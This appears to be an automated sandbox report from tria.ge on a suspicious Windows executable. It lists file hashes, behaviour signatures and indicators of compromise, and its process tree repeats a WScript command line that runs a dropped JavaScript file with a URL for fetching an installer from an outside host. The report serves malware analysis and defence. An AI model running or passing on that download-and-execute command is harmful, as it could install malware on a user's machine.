Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    134s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    31/05/2024, 09:51

General

  • Target

    8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe

  • Size

    184KB

  • MD5

    8695849edc287a9761aea3bab6a6feb1

  • SHA1

    83bab866fb8ad5bc85e3024133799ff6d45add46

  • SHA256

    91a34986c15dc37ac33b15e677f21940d992cf2c31b5af85d9ead18b251ef8a0

  • SHA512

    ddb6ccf813f7d7a7f888417569c3fe5e4953ba832b1581231c5016062859292fe4d7c3faf9d98dd0c8987fe2c43c45501c7740ff80404b21d4286cafe30479b2

  • SSDEEP

    3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3r:/7BSH8zUB+nGESaaRvoB7FJNndnO

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 5 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Command and Scripting Interpreter: JavaScript 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\8695849edc287a9761aea3bab6a6feb1_JaffaCakes118.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:2236
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4314.js" http://www.djapp.info/?domain=gFGYbUEsPC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf4314.exe
      2⤵
      • Blocklisted process makes network request
      PID:1588
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4314.js" http://www.djapp.info/?domain=gFGYbUEsPC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf4314.exe
      2⤵
      • Blocklisted process makes network request
      PID:4576
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4314.js" http://www.djapp.info/?domain=gFGYbUEsPC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf4314.exe
      2⤵
      • Blocklisted process makes network request
      PID:3532
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4314.js" http://www.djapp.info/?domain=gFGYbUEsPC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf4314.exe
      2⤵
      • Blocklisted process makes network request
      PID:3152
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4314.js" http://www.djapp.info/?domain=gFGYbUEsPC.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf4314.exe
      2⤵
      • Blocklisted process makes network request
      PID:4840

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\fuf4314.js

    Filesize

    3KB

    MD5

    3813cab188d1de6f92f8b82c2059991b

    SHA1

    4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

    SHA256

    a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

    SHA512

    83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76